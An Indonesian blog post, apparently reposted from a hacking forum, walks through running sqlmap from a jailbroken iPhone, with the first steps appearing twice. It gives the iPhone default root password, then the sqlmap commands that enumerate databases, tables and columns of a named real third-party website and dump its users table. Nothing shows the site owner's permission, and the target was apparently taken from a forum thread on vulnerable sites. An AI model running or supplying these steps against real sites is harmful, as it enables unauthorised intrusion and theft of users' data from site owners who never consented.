Assalamualaikum. Wr. Wb.
selamat malam warga Dunia Maya smua...
sharing ilmu kali ini (berrawal dari ide kecil ane pas lagi maen2 sama havij di komputer trus ngeliat iPhone ane dan mikir kira-kira bisa g ya sqli dari iPhone...?)
nah akhirnya ane nanya ama kakek ane yg paling pinter se jagat maya, lalu menemukan lah lanjutan ide ane ini... okey g usah banyak bacot kita langsung ke resep masakannya...
proses pembuatan dan peralatan yg ane pnya...
1. iPhone 3GS yang udah di (wajib) jailbrake
2. source reponya di tambahin dengan yg ini
3. download and install dua program ini dari cydianya langsung.. 
4. nah skrg masuk deh ke "Terminal Emulator" tadi.
5. login dah sebagai user ROOT caranya:
6. masuk deh ke directory sqlmapnya:
7. kita dsini pake web vuln yg udah pernah di post ama om @SaccaFrazi tritnya
8. kita mulai 
kita ketik perintahnya...
9. kita coba inject 
10. nah sekarang kita cari table user ato admin ato login ato apapun lah... 
11. sekarang kita cari column dari tabel yang tadi kita dapet... 
12. nah dah gitu kita dump deh ato mo di liat langsung juga boleh.. 
![[Image: ape52t.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uHV_5Lrzmj2ZlsxTZod6BgXQUMei9cfUwkNgFzBDPS4NwJEvBbSC-tVMvaAldgdXuvh1bG7C22qe1nZ-G6Cqr7knvylg=s0-d)
selamat malam warga Dunia Maya smua...
sharing ilmu kali ini (berrawal dari ide kecil ane pas lagi maen2 sama havij di komputer trus ngeliat iPhone ane dan mikir kira-kira bisa g ya sqli dari iPhone...?)
nah akhirnya ane nanya ama kakek ane yg paling pinter se jagat maya, lalu menemukan lah lanjutan ide ane ini... okey g usah banyak bacot kita langsung ke resep masakannya...
proses pembuatan dan peralatan yg ane pnya...
1. iPhone 3GS yang udah di (wajib) jailbrake
2. source reponya di tambahin dengan yg ini
PHP Code:
http://ininjas.com/repo/ PHP Code:
-Terminal Emulator-Python (biasanya dah langsung ke install)
-SQLmap 5. login dah sebagai user ROOT caranya:
PHP Code:
ketik : su <enter>password: alpine(password default root iPhone seluruh dunia...) 6. masuk deh ke directory sqlmapnya:
PHP Code:
cd /pentest/database/sqlmap; ls ![[Image: i6h6ki.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s93gSFBk7ClxubpGnTVxwrVlgWShCZdQmlxwMtDEfV1KwzvZoF_CIxyst6MTb-L65G5_Oe7KjOacp1CkKo7-_2VXT78A=s0-d)
PHP Code:
http://devilzc0de.org/forum/thread-459-page-23.html PHP Code:
Analyzing http://www.pioneer-group.co.uk/event.php?id=17Host IP: 79.170.44.145
Web Server: Apache/2
Powered-by: PHP/5.2.17 kita ketik perintahnya...
PHP Code:
./sqlmap.py -h ![[Image: abjfrs.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s351eXas1aPv5gvY0GGSh1iA8pLeIst2qxjcG9mZFHtLIdtH0okoKUhn8nxZXFLMhd9DDy3dWsf9_PNPQ5hemu6rLZ=s0-d)
PHP Code:
./sqlmap.py -u http://www.pioneer-group.co.uk/event.php?id=17 --dbskita coba cari nama databasenya.. ![[Image: 120ikhd.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_v_hvrcABCVL-DqGE04PYDCVs89EfKH7BeAxJ64MLevv6lwiMwMQRxvA6GpzaD7Ec9sxpNhimclFNWgtYJDOO9Ky40F7A=s0-d)
![[Image: 2luwbgx.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vDpvgr20zWR01dOvUayGI1IcDTRp15no2GKxr2ozN2L-w5zrtK-p9jWr7fQ8oluODxKwXdZlk1J90ceCh-5rEtNUikwqg=s0-d)
PHP Code:
./sqlmap.py -u http://www.pioneer-group.co.uk/event.php?id=17 -D web145-pioneer --tables ![[Image: 2ennx9s.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vApEF1vwGc-f6gVcXyWf_4j9JharX1mt7l4FgwwLKlBwHpKU6QYj_Krfn6RfyyNAonxG9oOHqoqK4ImXfs80p6qI0wVBY=s0-d)
PHP Code:
./sqlmap.py http://www.pioneer-group.co.uk/event.php?id=17 -D web145-pioneer -T PIONEER_GROUP_USERS --columns ![[Image: 2u7rb5v.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s5bdkWmZ6AADLcKOVG7E2z8I90J2XCYjdDK1qf4VTzL42jFU_fWIdLDHSEw_oVcdE9vhyOca5mL9z6t4YdAcraepKjS1Q=s0-d)
PHP Code:
./sqlmap.py http://www.pioneer-group.co.uk/event.php?id=17 -D web145-pioneer -T PIONEER_GROUP_USERS --dump 
Ichsan Bahri
I'm Ichsan. A full time web designer. I enjoy to make modern template. I love create blogger template and write about web design, blogger. Now I'm working with Themeforest. You can buy our templates from Themeforest.
Website: http://sagoe.net/
No Comment to " sqli-lewat-iphone (baca) "